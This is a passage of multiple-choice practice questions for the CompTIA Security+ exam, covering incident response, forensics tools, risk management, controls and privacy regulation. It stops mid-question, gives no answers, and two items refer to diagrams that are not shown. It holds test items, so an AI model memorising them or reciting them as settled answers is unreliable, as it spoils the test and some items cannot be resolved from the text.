102. As part of a breach response, Naomi discovers that Social Security numbers (SSNs) were sent in a spreadsheet via email by an attacker who gained control of a workstation at her company's headquarters. Naomi wants to ensure that more SSNs are not sent from her environment. What type of mitigation technique is most likely to prevent this while allowing operations to continue in as normal a manner as possible?

A. Antimalware installed at the email gateway

B. A firewall that blocks all outbound email

C. A DLP rule blocking SSNs in email

D. An IDS rule blocking SSNs in email

103. Troy wants to review metadata about an email he has received to determine what system or server the email was sent from. Where can he find this information?

A. In the email message's footer

B. In the to: field

C. In the email message's headers

D. In the from: field

104. Henry is working with local police on a forensic case and discovers that he needs data from a service provider in another state. What issue is likely to limit their ability to acquire data from the service provider?

A. Jurisdiction

B. Venue

C. Legislation

D. Breach laws

105. Olivia wants to test the strength of passwords on systems in her network. Which of the following tools is best suited to that task?

A. John the Ripper

B. Rainbow tables

C. Crack.it

D. The Hunter

106. What U.S. federal agency is in charge of COOP?

A. The USDA

B. FEMA

C. The NSA

D. The FBI

107. Elaine wants to write a series of scripts to gather security configuration information from Windows 10 workstations. What tool should she use to perform this task?

A. Bash

B. PowerShell

C. Python

D. SSH

108. As part of his incident response, Ramon wants to determine what was said on a Voice over IP (VoIP) call. Which of the following data sources will provide him with the audio from the call?

A. Call manager logs

B. SIP logs

C. A Wireshark capture of traffic from the phone

D. None of the above

109. Isabelle wants to gather information about what systems a host is connecting to, how much traffic is sent, and similar details. Which of the following options would not allow her to perform that task?

A. IPFIX

B. NetFlow

C. NXLog

D. sFlow

110. As part of an incident response process, Pete puts a compromised system onto a virtual LAN (VLAN) that he creates that only houses that system and does not allow it access to the Internet. What mitigation technique has he used?

A. Isolation

B. Containment

C. Segmentation

D. Eradication

111. Lucca needs to conduct a forensic examination of a live virtual machine (VM). What forensic artifact should he acquire?

A. An image of live memory using FTK Imager from the VM

B. A dd image of the virtual machine disk image

C. A snapshot of the VM using the underlying virtualization environment

D. All of the above

112. James has a PCAP file that he saved while conducting an incident response exercise. He wants to determine if his intrusion prevention system (IPS) could detect the attack after configuring new detection rules. What tool will help him use the PCAP file for his testing?

A. hping

B. tcpreplay

C. tcpdump

D. Cuckoo

113. What type of file is created when Windows experiences a blue screen of death?

A. A security log

B. A blue log

C. A dump file

D. A tcpdump

114. Ed wants to ensure that a compromise on his network does not spread to parts of the network with different security levels. What mitigation technique should he use prior to the attack to help with this?

A. Isolation

B. Fragmentation

C. Tiering

D. Segmentation

115. Derek has acquired over 20 hard drives as part of a forensic investigation. What key process is important to ensure that each drive is tracked and managed properly over time?

A. Tagging the drives

B. Taking pictures of each drive

C. Labeling each drive with its order of volatility

D. Interviewing each person whose drive is imaged

116. What term describes the ownership, custody, and acquisition of digital forensic artifacts and images?

A. E-discovery

B. Provenance

C. Jurisdiction

D. Volatility

117. Elle wants to acquire the live memory (RAM) from a machine that is currently turned on. Which of the following tools is best suited to acquiring the contents of the system's memory?

A. Autopsy

B. The Volatility framework

C. dd

D. netcat

118. Randy believes that a misconfigured firewall is blocking traffic sent from some systems in his network to his web server. He knows that the traffic should be coming in as HTTPS to his web server, and he wants to check to make sure the traffic is received. What tool can he use to test his theory?

A. tracert

B. Sn1per

C. traceroute

D. Wireshark

119. Ryan wants to implement a flexible and reliable remote logging environment for his Linux systems. Which of the following tools is least suited to that requirement?

A. rsyslog

B. syslog

C. NXLog

D. syslog-ng

120. Susan has been reading about a newly discovered exploit, and wants to test her IPS rules to see if the sample code will work. In order to use the exploit, she needs to send a specifically crafted UDP packet to a DHCP server. What tool can she use to craft and send this test exploit to see if it is detected?

A. hping

B. scanless

C. curl

D. pathping

121. Valerie wants to check to see if a SQL injection attack occurred against her web application on a Linux system. Which log file should she check for this type of information?

A. The security log

B. The DNS log

C. The auth log

D. The web server log

122. Olivia's company has experienced a breach and believes that the attackers were able to access the company's web servers. There is evidence that the private keys for the certificates for the server were exposed and that the passphrases for the certificates were kept in the same directory. What action should Olivia take to handle this issue?

A. Revoke the certificates.

B. Change the certificate password.

C. Change the private key for the certificate.

D. Change the public key for the certificate.

123. Jean's company is preparing for litigation with another company that they believe has caused harm to Jean's organization. What type of legal action should Jean's lawyer take to ensure that the company preserves files and information related to the legal case?

A. A chain of custody demand letter

B. An e-discovery notice

C. A legal hold notice

D. An order of volatility

124. Cynthia wants to display all of the active connections on a Windows system. What command can she run to do so?

A. route

B. netstat -a

C. netstat -c

D. hping

125. What type of mitigation places a malicious file or application in a safe location for future review or study?

A. Containment

B. Quarantine

C. Isolation

D. Deletion

126. What location is commonly used for Linux swap space?

A. \root\swap

B. \etc\swap

C. \proc\swap

D. A separate partition

127. Marco is conducting a forensic investigation and is preparing to pull eight different storage devices from computers that he will analyze. What should he use to track the drives as he works with them?

A. Tags with system, serial number, and other information

B. MD5 checksums of the drives

C. Timestamps gathered from the drives

D. None of the above; the drives can be identified by the data they contain

128. Isaac executes the following command using netcat:

nc -v 10.11.10.11 -1024

What has he done?

A. Opened a web page

B. Connected to a remote shell

C. Opened a local shell listener

D. Performed a port scan

129. Tony works for a large company with multiple sites. He has identified an incident in progress at one site that is connected to the organization's multisite intranet. Which of the following options is best suited to preserving the organization's function and protecting it from issues at that location?

A. Isolation

B. Containment

C. Segmentation

D. None of the above

130. Which of the following environments is least likely to allow a right-to-audit clause in a contract?

A. A datacenter co-location facility in your state

B. A rented facility for a corporate headquarters

C. A cloud server provider

D. A datacenter co-location facility in the same country but not the same state

131. Alaina's organization has been suffering from successful phishing attacks, and Alaina notices a new email that has arrived with a link to a phishing site. What response option from the following will be most likely to stop the phishing attack from succeeding against her users?

A. A WAF

B. A patch

C. An allow list

D. A URL filter

132. Ben writes down the checklist of steps that his organization will perform in the event of a cryptographic malware infection. What type of response document has he created?

A. A playbook

B. A DR plan

C. A BC plan

D. A runbook

133. Which of the following is not information that can be gathered from a system by running the arp command?

A. The IP address of the local system

B. The MAC addresses of recently resolved external hosts

C. Whether the IP address is dynamic or static

D. The MAC addresses of recently resolved local hosts

134. What log will journalctl provide Selah access to?

A. The event log

B. The auth log

C. The systemd journal

D. The authentication journal

135. What phase of the incident response process often involves adding firewall rules and patching systems to address the incident?

A. Preparation

B. Eradication

C. Recovery

D. Containment

136. Gary wants to use a tool that will allow him to download files via HTTP and HTTPS, SFTP, and TFTP from within the same script. Which command-line tool should he pick from the following list?

A. curl

B. hping

C. theHarvester

D. nmap

137. Tim wants to check the status of malware infections in his organization using the organization's security information and event management (SIEM) device. What SIEM dashboard will tell him about whether there are more malware infections in the past few days than normal?

A. The alerts dashboard

B. The sensors dashboard

C. The trends dashboard

D. The bandwidth dashboard

138. Warren is gathering information about an incident and wants to follow up on a report from an end user. What digital forensic technique is often used when end users are a key part of the initial incident report?

A. Email forensics

B. Interviews

C. Disk forensics

D. Chain of custody

139. Aaron wants to use a multiplatform logging tool that supports both Windows and Unix/Linux systems and many log formats. Which of the following tools should he use to ensure that his logging environment can accept and process these logs?

A. IPFIX

B. NXLog

C. syslog

D. journalctl

140. Which of the following is not a common type of incident response exercise?

A. Drills

B. Simulations

C. Tabletop

D. Walk-throughs

141. Susan needs to run a port scan of a network. Which of the following tools would not allow her to perform that type of scan?

A. netstat

B. netcat

C. nmap

D. Nessus

142. What term belongs at point A on the Diamond Model of Intrusion Analysis shown below?

A. Opponent

B. Target

C. Adversary

D. System

143. The government agency that Vincent works for has received a Freedom of Information Act (FoIA) request and needs to provide the requested information from its email servers. What is this process called?

A. Email forensics

B. An inquisition

C. e-discovery

D. Provenance

Chapter 5: Governance, Risk, and Compliance

THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:

5.1 Compare and contrast various types of controls

5.2 Explain the importance of applicable regulations, standards, or frameworks that impact organizational security posture

5.3 Explain the importance of policies to organizational security

5.4 Summarize risk management processes and concepts

5.5 Explain privacy and sensitive data concepts in relation to security

1. Caroline has been asked to find an international standard to guide her company's choices in implementing information security management systems. Which of the following would be the best choice for her?

A. ISO 27002

B. ISO 27017

C. NIST 800-12

D. NIST 800-14

2. Adam is concerned about malware infecting machines on his network. One of his concerns is that malware would be able to access sensitive system functionality that requires administrative access. What technique would best address this issue?

A. Implementing host-based antimalware

B. Using a nonadministrative account for normal activities

C. Implementing full-disk encryption (FDE)

D. Making certain the operating systems are patched

3. You are responsible for setting up new accounts for your company network. What is the most important thing to keep in mind when setting up new accounts?

A. Password length

B. Password complexity

C. Account age

D. Least privileges

4. Which of the following principles stipulates that multiple changes to a computer system should not be made at the same time?

A. Due diligence

B. Acceptable use

C. Change management

D. Due care

5. You are a security engineer and discovered an employee using the company's computer systems to operate their small business. The employee installed their personal software on the company's computer and is using the computer hardware, such as the USB port. What policy would you recommend the company implement to prevent any risk of the company's data and network being compromised?

A. Acceptable use policy

B. Clean desk policy

C. Mandatory vacation policy

D. Job rotation policy

6. What standard is used for credit card security?

A. GDPR

B. COPPA

C. PCI-DSS

D. CIS

7. You are a security manager for your company and need to reduce the risk of employees working in collusion to embezzle funds. Which of the following policies would you implement?

A. Mandatory vacations

B. Clean desk

C. NDA

D. Continuing education

8. After your company implemented a clean desk policy, you have been asked to secure physical documents every night. Which of the following would be the best solution?

A. Department door lock

B. Locking cabinets and drawers at each desk

C. Proximity cards

D. Onboarding

9. Which of the following techniques attempts to predict the likelihood a threat will occur and assigns monetary values should a loss occur?

A. Change management

B. Vulnerability assessment

C. Qualitative risk assessment

D. Quantitative risk assessment

10. Which of the following agreements is less formal than a traditional contract but still has a certain level of importance to all parties involved?

A. SLA

B. BPA

C. ISA

D. MOU

11. As part of the response to a credit card breach, Sally discovers evidence that individuals in her organization were actively working to steal credit card information and personally identifiable information (PII). She calls the police to engage them for the investigation. What has she done?

A. Escalated the investigation

B. Public notification

C. Outsourced the investigation

D. Tokenized the data

12. You have an asset that is valued at $16,000, the exposure factor of a risk affecting that asset is 35 percent, and the annualized rate of occurrence is 75 percent. What is the SLE?

A. $5,600

B. $5,000

C. $4,200

D. $3,000

13. During a meeting, you present management with a list of access controls used on your network. Which of the following controls is an example of a corrective control?

A. IDS

B. Audit logs

C. Antivirus software

D. Router

14. You are the new security administrator and have discovered your company lacks deterrent controls. Which of the following would you install that satisfies your needs?

A. Lighting

B. Motion sensor

C. Hidden video cameras

D. Antivirus scanner

15. Your company's security policy includes system testing and security awareness training guidelines. Which of the following control types is this?

A. Detective technical control

B. Preventive technical control

C. Detective administrative control

D. Preventive administrative control

16. You are a security administrator for your company and you identify a security risk. You decide to continue with the current security plan. However, you develop a contingency plan in case the security risk occurs. Which of the following types of risk response techniques are you demonstrating?

A. Accept

B. Transfer

C. Avoid

D. Mitigate

17. Jim's company operates facilities in Illinois, Indiana, and Ohio, but the headquarters is in Illinois. Which state laws does Jim need to review and handle as part of his security program?

A. All U.S. state laws

B. Illinois

C. Only U.S. federal laws

D. State laws in Illinois, Indiana, and Ohio

18. You are an IT administrator for a company and you are adding new employees to an organization's identity and access management system. Which of the following best describes the process you are performing?

A. Onboarding

B. Offboarding

C. Adverse action

D. Job rotation

19. Mark is an office manager at a local bank branch. He wants to ensure that customer information isn't compromised when the deskside employees are away from their desks for the day. What security concept would Mark use to mitigate this concern?

A. Clean desk

B. Background checks

C. Continuing education

D. Job rotation

20. You are a security administrator and advise the web development team to include a CAPTCHA on the web page where users register for an account. Which of the following controls is this referring to?

A. Deterrent

B. Detective

C. Compensating

D. Degaussing

21. Which of the following is not a common security policy type?

A. Acceptable use policy

B. Social media policy

C. Password policy

D. Parking policy

22. As the IT security officer for your organization, you are configuring data label options for your company's research and development file server. Regular users can label documents as contractor, public, or internal. Which label should be assigned to company trade secrets?

A. High

B. Top secret

C. Proprietary

D. Low

23. Which of the following is not a physical security control?

A. Motion detector

B. Fence

C. Antivirus software

D. Closed-circuit television (CCTV)

24. Your security manager wants to decide which risks to mitigate based on cost. What is this an example of?

A. Quantitative risk assessment

B. Qualitative risk assessment

C. Business impact analysis

D. Threat assessment

25. Your company has outsourced its proprietary processes to Acme Corporation. Due to technical issues, Acme wants to include a third-party vendor to help resolve the technical issues. Which of the following must Acme consider before sending data to the third party?

A. This data should be encrypted before it is sent to the third-party vendor.

B. This may constitute unauthorized data sharing.

C. This may violate the privileged user role-based awareness training.

D. This may violate a nondisclosure agreement.

26. Which of the following is considered a detective control?

A. Closed-circuit television (CCTV)

B. An acceptable use policy

C. Firewall

D. IPS

27. Which of the following is typically included in a BPA?

A. Clear statements detailing the expectation between a customer and a service provider

B. The agreement that a specific function or service will be delivered at the agreed-on level of performance

C. Sharing of profits and losses and the addition or removal of a partner

D. Security requirements associated with interconnecting IT systems

28. You are the network administrator of your company, and the manager of a retail site located across town has complained about the loss of power to their building several times this year. The branch manager is asking for a compensating control to overcome the power outage. What compensating control would you recommend?

A. Firewall

B. Security guard

C. IDS

D. Backup generator

29. James is a security administrator and is attempting to block unauthorized access to the desktop computers within the company's network. He has configured the computers’ operating systems to lock after 5 minutes of no activity. What type of security control has James implemented?

A. Preventive

B. Corrective

C. Deterrent

D. Detective

30. An accounting employee changes roles with another accounting employee every 4 months. What is this an example of?

A. Separation of duties

B. Mandatory vacation

C. Job rotation

D. Onboarding

31. Tony's company wants to limit their risk due to customer data. What practice should they put in place to ensure that they have only the data needed for their business purposes?

A. Data masking

B. Data minimization

C. Tokenization

D. Anonymization

32. Your company website is hosted by an Internet service provider. Which of the following risk response techniques is in use?

A. Risk avoidance

B. Risk register

C. Risk acceptance

D. Risk mitigation

33. A security administrator is reviewing the company's continuity plan, and it specifies an RTO of four hours and an RPO of one day. Which of the following is the plan describing?

A. Systems should be restored within one day and should remain operational for at least four hours.

B. Systems should be restored within four hours and no later than one day after the incident.

C. Systems should be restored within one day and lose, at most, four hours’ worth of data.

D. Systems should be restored within four hours with a loss of one day's worth of data at most.

34. Which of the following statements is true regarding a data retention policy?

A. Regulations require financial transactions to be stored for seven years.

B. Employees must remove and lock up all sensitive and confidential documents when not in use.

C. It describes a formal process of managing configuration changes made to a network.

D. It is a legal document that describes a mutual agreement between parties.

35. How do you calculate the annual loss expectancy (ALE) that may occur due to a threat?

A. Exposure factor (EF) / single loss expectancy (SLE)

B. Single loss expectancy (SLE) × annual rate of occurrence (ARO)

C. Asset value (AV) × exposure factor (EF)

D. Single loss expectancy (SLE) / exposure factor (EF)

36. Michelle has been asked to use the CIS benchmark for Windows 10 as part of her system security process. What information will she be using?

A. Information on how secure Windows 10 is in its default state

B. A set of recommended security configurations to secure Windows 10

C. Performance benchmark tools for Windows 10 systems, including network speed and firewall throughput

D. Vulnerability scan data for Windows 10 systems provided by various manufacturers

37. Which of the following is the best example of a preventive control?

A. Data backups

B. Security camera

C. Door alarm

D. Smoke detectors

38. You are a security administrator for your company and you identify a security risk that you do not have in-house skills to address. You decide to acquire contract resources. The contractor will be responsible for handling and managing this security risk. Which of the following types of risk response techniques are you demonstrating?

A. Accept

B. Mitigate

C. Transfer

D. Avoid

39. Each salesperson who travels has a cable lock to lock down their laptop when they step away from the device. To which of the following controls does this apply?

A. Administrative

B. Compensating

C. Deterrent

D. Preventive

40. You are a server administrator for your company's private cloud. To provide service to employees, you are instructed to use reliable hard disks in the server to host a virtual environment. Which of the following best describes the reliability of hard drives?

A. MTTR

B. RPO

C. MTBF

D. ALE

41. All of your organization's traffic flows through a single connection to the Internet. Which of the following terms best describes this scenario?

A. Cloud computing

B. Load balancing

C. Single point of failure

D. Virtualization

42. Which of the following best describes the disadvantages of quantitative risk analysis compared to qualitative risk analysis?

A. Quantitative risk analysis requires detailed financial data.

B. Quantitative risk analysis is sometimes subjective.

C. Quantitative risk analysis requires expertise on systems and infrastructure.

D. Quantitative risk provides clear answers to risk-based questions.

43. Leigh Ann is the new network administrator for a local community bank. She studies the current file server folder structures and permissions. The previous administrator didn't properly secure customer documents in the folders. Leigh Ann assigns appropriate file and folder permissions to be sure that only the authorized employees can access the data. What security role is Leigh Ann assuming?

A. Power user

B. Data owner

C. User

D. Custodian

44. Categorizing residual risk is most important to which of the following risk response techniques?

A. Risk mitigation

B. Risk acceptance

C. Risk avoidance

D. Risk transfer

45. You are the IT manager and one of your employees asks who assigns data labels. Which of the following assigns data labels?

A. Owner

B. Custodian

C. Privacy officer

D. System administrator

46. Which of the following is the most pressing security concern related to social media networks?

A. Other users can view your MAC address.

B. Other users can view your IP address.

C. Employees can leak a company's confidential information.

D. Employees can express their opinion about their company.

47. What concept is being used when user accounts are created by one employee and user permissions are configured by another employee?

A. Background checks

B. Job rotation

C. Separation of duties

D. Collusion

48. A security analyst is analyzing the cost the company could incur if the customer database was breached. The database contains 2,500 records with personally identifiable information (PII). Studies show the cost per record would be $300. The likelihood that the database would be breached in the next year is only 5 percent. Which of the following would be the ALE for a security breach?

A. $15,000

B. $37,500

C. $150,000

D. $750,000

49. Which of the following concepts defines a company goal for system restoration and acceptable data loss?

A. MTBF

B. MTTR

C. RPO

D. ARO

50. Your company hires a third-party auditor to analyze the company's data backup and long-term archiving policy. Which type of organization document should you provide to the auditor?

A. Clean desk policy

B. Acceptable use policy

C. Security policy

D. Data retention policy

51. You are a network administrator and have been given the duty of creating user accounts for new employees the company has hired. These employees are added to the identity and access management system and assigned mobile devices. What process are you performing?

A. Offboarding

B. System owner

C. Onboarding

D. Executive user

52. What type of control is separation of duty?

A. Physical

B. Operational

C. Technical

D. Compensating

53. Which of the following rights is not included in the GDPR?

A. The right to access

B. The right to be forgotten

C. The right to data portability

D. The right to anonymity

54. Nick is following the National Institute of Standards and Technology (NIST) Risk Management Framework (RMF) and has completed the prepare and categorize steps. Which step in the risk management framework is next?

A. Assessing controls

B. Implementing controls

C. Monitoring controls

D. Selecting controls

55. Why is diversity of training techniques an important concept for security program administrators?

A. It allows for multiple funding sources.

B. Each person responds to training differently.

C. It avoids a single point of failure in training compliance.

D. It is required for compliance with PCI-DSS.

56. Alyssa has been asked to categorize the risk of outdated software in her organization. What type of risk categorization should she use?

A. Internal

B. Quantitative

C. Qualitative

D. External

57. What term is used to describe a listing of all of an organization's risks, including information about the risk's rating, how it is being remediated, remediation status, and who owns or is assigned responsibility for the risk?

A. An SSAE

B. A risk register

C. A risk table

D. A DSS

58. Which of the following terms is used to measure how maintainable a system or device is?

A. MTBF

B. MTTF

C. MTTR

D. MITM

59. The company that Olivia works for has recently experienced a data breach that exposed customer data, including their home addresses, shopping habits, email addresses, and contact information. Olivia's company is an industry leader in their space but has strong competitors as well. Which of the following impacts is not likely to occur now that the organization has completed their incident response process?

A. Identity theft

B. Financial loss

C. Reputation loss

D. Availability loss

60. Eric works for the U.S. government and needs to classify data. Which of the following is not a common classification type for U.S. government data?

A. Top Secret

B. Secret

C. Confidential

D. Civilian

61. Which of the following is not a common location for privacy practices to be recorded or codified?

A. A formal privacy notice

B. The source code for a product

C. The terms of the organization's agreement with customers

D. None of the above

62. What key difference separates pseudonymization and anonymization?

A. Anonymization uses encryption.

B. Pseudonymization requires additional data to reidentify the data subject.

C. Anonymization can be reversed using a hash.

D. Pseudonymization uses randomized tokens.

63. What policy clearly states the ownership of information created or used by an organization?

A. A data governance policy

B. An information security policy

C. An acceptable use policy

D. A data retention policy

64. Helen's organization provides telephone support for their entire customer base as a critical business function. She has created a plan that will ensure that her organization's Voice over IP (VoIP) phones will be restored in the event of a disaster. What type of plan has she created?

A. A disaster recovery plan

B. An RPO plan

C. A functional recovery plan

D. An MTBF plan

65. Greg has data that is classified as health information that his organization uses as part of their company's HR data. Which of the following statements is true for his company's security policy?

A. The health information must be encrypted.

B. Greg should review relevant law to ensure the health information is handled properly.

C. Companies are prohibited from storing health information and must outsource to third parties.

D. All of the above

66. What type of information does a control risk apply to?

A. Health information

B. Personally identifiable information (PII)

C. Financial information

D. Intellectual property

67. What type of impact is an individual most likely to experience if a data breach that includes PII occurs?

A. IP theft

B. Reputation damage

C. Fines

D. Identity theft

68. Isaac has been asked to write his organization's security policies. What policy is commonly put in place for service accounts?

A. They must be issued only to system administrators.

B. They must use multifactor authentication.

C. They cannot use interactive logins.

D. All of the above

69. Nina is tasked with putting radio frequency identification (RFID) tags on every new piece of equipment that enters her datacenter that costs more than $500. What type of organizational policy is most likely to include this type of requirement?

A. A change management policy

B. An incident response policy

C. An asset management policy

D. An acceptable use policy

70. Megan is reviewing her organization's datacenter network diagram as shown in the following image. What should she note for point A on the diagram?

A. A wireless link

B. A redundant connection

C. A wired link

D. A single point of failure

71. Emma is reviewing third-party risks to her organization, and Nate, her organization's procurement officer, notes that purchases of some laptops from the company's hardware vendor have been delayed due to lack of availability of SSDs (solid state drives) and specific CPUs for specific configurations. What type of risk should Emma describe this as?

A. Financial risk

B. A lack of vendor support

C. System integration

D. Supply chain

72. Henry has implemented an intrusion detection system. What category and control type could he list for an IDS?

A. Technical, Detective

B. Administrative, Preventative

C. Technical, Corrective

D. Administrative, Detective

73. Amanda administers Windows 10 workstations for her company and wants to use a secure configuration guide from a trusted source. Which of the following is not a common source for Windows 10 security benchmarks?

A. CIS

B. Microsoft

C. The FTC

D. The NSA

74. Katie has discovered a Windows 2008 web server running in her environment. What security concern should she list for this system?

A. Windows 2008 only runs on 32-bit platforms.

B. Windows 2008 cannot run modern web server software.

C. Windows 2008 has reached its end of life and cannot be patched.

D. All of the above

75. Patching systems immediately after patches are released is an example of what risk management strategy?

A. Acceptance

B. Avoidance

C. Mitigation

D. Transference

76. Charles wants to display information from his organization's risk register in an easy-to-understand and -rank format. What common tool is used to help management quickly understand relative rankings of risk?

A. Risk plots

B. A heat map

C. A qualitative risk assessment

D. A quantitative risk assessment

77. What key element of regulations, like the European Union's (EU's) GDPR, drives organizations to include them in their overall assessment of risk posture?

A. Potential fines

B. Their annual loss expectancy (ALE)

C. Their recovery time objective (RTO)

D. The likelihood of occurrence

78. What phases of handling a disaster are covered by a disaster recovery plan?

A. What to do before the disaster

B. What to do during the disaster

C. What to do after the disaster

D. All of the above

79. Naomi's organization has recently experienced a breach of credit card information. After investigation, it is discovered that her organization was inadvertently not fully compliant with PCI-DSS and is not currently fully compliant. Which of the following penalties is her organization most likely to incur?

A. Criminal charges

B. Fines

C. Termination of the credit card processing agreement

D. All of the above

80. Alaina wants to map a common set of controls for cloud services between standards like COBIT (Control Objectives for Information and Related Technology), FedRAMP (Federal Risk and Authorization Management Program), HIPAA (the Health Insurance Portability and Accountability Act of 1996), and others. What can she use to speed up that process?

A. The CSA's reference architecture

B. ISO 27001

C. The CSA's cloud control matrix

D. ISO 27002

81. Gary has created an application that new staff in his organization are asked to use as part of their training. The application shows them examples of phishing emails and asks the staff members to identify the emails that are suspicious and why. Correct answers receive points, and incorrect answers subtract points. What type of user training technique is this?

A. Capture the flag

B. Gamification

C. Phishing campaigns

D. Role-based training

82. What law or regulation requires a DPO in organizations?

A. FISMA

B. COPPA

C. PCI-DSS

D. GDPR

83. The university that Susan works for conducts top secret research for the U.S. Department of Defense as part of a partnership with its engineering school. A recently discovered breach points to the school being compromised for over a year by an advanced persistent threat actor. What consequence of the breach should Susan be most concerned about?

A. Cost to restore operations

B. Fines

C. Identity theft

D. IP theft

84. What term is used to describe the functions that need to be continued throughout or resumed as quickly as possible after a disaster?

A. Single points of failure

B. Mission-essential functions

C. Recovery time objectives

D. Core recovery functions

85. Your company is considering moving its mail server to a hosting company. This will help reduce hardware and server administrator costs at the local site. Which of the following documents would formally state the reliability and recourse if the reliability is not met?

A. MOU

B. SLA

C. ISA

D. BPA

86. Rick's organization provides a website that allows users to create an account and then upload their art to share with other users. He is concerned about a breach and wants to properly classify the data for their handling process. What data type is most appropriate for Rick to label the data his organization collects and stores?

A. Customer data

B. PII

C. Financial information

D. Health information

87. Jack is conducting a risk assessment, and a staff member notes that the company has specialized, internal AI algorithms that are part of the company's main product. What risk should Jack identify as most likely to impact those algorithms?

A. External

B. Internal

C. IP theft

D. Licensing

88. Dan has written a policy that prohibits employees from sharing their passwords with their coworkers, family members, or others. What type of credential policy has he created?

A. Device credential policy

B. Personnel credential policy

C. A service account policy

D. An administrative account policy

89. Risk severity is calculated using the equation shown here. What information should be substituted for X?

Risk severity = X * Impact

A. Inherent risk

B. MTTR (mean time to repair)

C. Likelihood of occurrence

D. RTO (recovery time objective)

90. How is asset value determined?

A. The original cost of the item

B. The depreciated cost of the item

C. The cost to replace the item

D. Any of the above based on organizational preference

91. What process is used to help identify critical systems?

A. A BIA

B. An MTBF

C. An RTO

D. An ICD

92. Zarmeena wants to transfer the risk for breaches to another organization. Which of the following options should she use to transfer the risk?

A. Explain to her management that breaches will occur.

B. Blame future breaches on competitors.

C. Sell her organization's data to another organization.

D. Purchase cybersecurity insurance.

93. Which of the following is a common security policy for service accounts?

A. Limiting login hours

B. Prohibiting interactive logins

C. Limiting login locations

D. Implementing frequent password expiration

94. The financial cost of a breach is an example of what component of risk calculations?

A. Probability

B. Risk severity

C. Impact

D. All of the above

95. As part of his organization's effort to identify a new headquarters location, Sean reviews the Federal Emergency Management Agency (FEMA) flood maps for the potential location he is reviewing. What process related to disaster recovery planning includes actions like this?

A. Business impact analysis (BIA)

B. Site risk assessment

C. Crime prevention through environmental design

D. Business continuity planning

96. Joanna wants to request an audit report from a vendor she is considering and plans to review the auditor's opinions on the effectiveness of the security and privacy controls the vendor has in place. What type of Standard for Attestation Engagements (SSAE) report should she request?

A. SSAE-18 SOC 1, Type 2

B. SSAE-18 SOC 2, Type 1

C. SSAE-18 SOC 1, Type 1

D. SSAE-18 SOC 2, Type 2

97. Jason has created a risk register for his organization and regularly updates it with input from managers and senior leadership throughout the organization. What purpose does this serve?

A. It decreases inherent risk.

B. It increases risk awareness.

C. It decreases residual risk.

D. It increases risk appetite.

98. Laura is aware that her state has laws that guide her organization in the event of a breach of personally identifiable information, including Social Security numbers (SSNs). If she has a breach that involves SSNs, what action is she likely to have to take based on state law?

A. Destroy all Social Security numbers.

B. Reclassify all impacted data.

C. Provide public notification of the breach.

D. Provide a data minimization plan.

99. Which of the following does not minimize security breaches committed by internal employees?

A. Job rotation

B. Separation of duties

C. Nondisclosure agreements signed by employees

D. Mandatory vacations

100. Olivia's cloud service provider claims to provide "five nines of uptime," and Olivia's company wants to take advantage of that service because their website loses thousands of dollars every hour that it is down. What business agreement can Olivia put in place to help ensure that the reliability that the vendor advertises is maintained?

A. An MOU

B. An SLA

C. An MSA

D. A BPA

101. After reviewing systems on his network, Brian has discovered that dozens of them are running copies of a CAD software package that the company has not paid for. What risk type should he identify this as?

A. Internal

B. Legacy systems

C. IP theft

D. Software compliance

102. Gary is beginning his risk assessment for the organization and has not yet begun to implement controls. What risk does his organization face?

A. Residual risk

B. IP theft risk

C. Multiparty risk

D. Inherent risk

103. How is SLE calculated?

A. AV * EF

B. RTO * AV

C. MTTR * EF

D. AV * ARO

104. What type of credential policy is typically created to handle contractors and consultants?

A. A personnel policy

B. A service account policy

C. A third-party policy

D. A root account policy

105. Wayne has estimated the ARO for a risk in his organization to be 3. How often does Wayne think the event will happen?

A. Once every 3 months

B. Three times a year

C. Once every three years

D. Once a year for three years

106. Gurvinder is assessing risks from disasters to his company's facility and wants to properly categorize them in his planning. Which of the following is not a type of natural disaster?

A. Fire

B. Flood

C. Tornado

D. Industrial accidents

107. Madhuri is classifying all of her organization's data and wants to properly classify the information on the main organizational website that is available to anyone who visits the site. What data classification should she use from the following list?

A. Sensitive

B. Confidential

C. Public

D. Critical

108. Elle works for a credit card company that handles credit card transactions for businesses around the world. What data privacy role does her company play?

A. A data controller

B. A data steward

C. A data custodian

D. A data processor

109. The website that Brian is using shows part of his Social Security number, not all of it, replacing the rest of the digits with asterisks and allowing him to verify the last four digits. What technique is in use on the website?

A. Tokenization

B. Hashing

C. Encryption

D. Data masking

110. Mike wants to look for a common set of tools for security and risk management for his infrastructure as a service (IaaS) environment. Which of the following organizations provides a vendor-neutral reference architecture that he can use to validate his design?

A. The Center for Internet Security (CIS)

B. ISO

C. The Cloud Security Alliance

D. NIST

111. What type of control is a lock?

A. Managerial

B. Technical

C. Physical

D. Corrective

112. Isaac has discovered that his organization's financial accounting software is misconfigured, causing incorrect data to be reported on an ongoing basis. What type of risk is this?

A. Inherent risk

B. Residual risk

C. Control risk

D. Transparent risk

113. Which of the following is not a potential type of person-made disaster?

A. Fires

B. Oil spills

C. Hurricanes

D. War

114. Susan works for the U.S. government and has identified information in her organization that requires some protection. If the information were disclosed without authorization, it would cause identifiable harm to national security. How should she classify the data?

A. Top Secret

B. Secret

C. Confidential

D. Business Sensitive

115. Ed serves as his organization's data steward and wants to classify each data element that is used in their business. How should he classify cell phone numbers?

A. As PHI

B. As financial information

C. As PII

D. As government information

116. Marcus wants to ensure that attackers can't identify his customers if they were to gain a copy of his organization's web application database. He wants to protect their Social Security numbers (SSNs) with an alternate value that he can reference elsewhere when he needs to look up a customer by their SSN. What technique should he use to accomplish this?

A. Encryption

B. Tokenization

C. Data masking

D. Data washing

117. Which of the following is the most common reason to include a privacy notice on a website?

A. To warn attackers about security measures

B. To avoid lawsuits

C. Due to regulations or laws

D. None of the above

118. Nicole determines how her organization processes data that it collects about its customers and also decides how and why personal information should be processed. What role does Nicole play in her organization?

A. Data steward

B. Data custodian

C. Data controller

D. Data consumer

119. The virtual machine cluster that Pat is in charge of has suffered a major failure in its primary controller. The entire organization is offline, and customers cannot get to the organization's website, which is its primary business. What type of disaster has Pat's organization experienced?

A. An MRO disaster

B. An internal disaster

C. An RTO disaster

D. An external disaster

120. What important step should be taken early in the information lifecycle to ensure that organizations can handle the data they collect?

A. Data retention

B. Data classification

C. Data minimization

D. Data exfiltration

121. Kirk's organization has been experiencing large-scale denial-of-service (DoS) attacks against their primary website. Kirk contracts with his Internet service provider to increase the organization's bandwidth and expands the server pool for the website to handle significantly more traffic than any of the previous DoS attacks. What type of risk management strategy has he employed?

A. Acceptance

B. Avoidance

C. Transfer

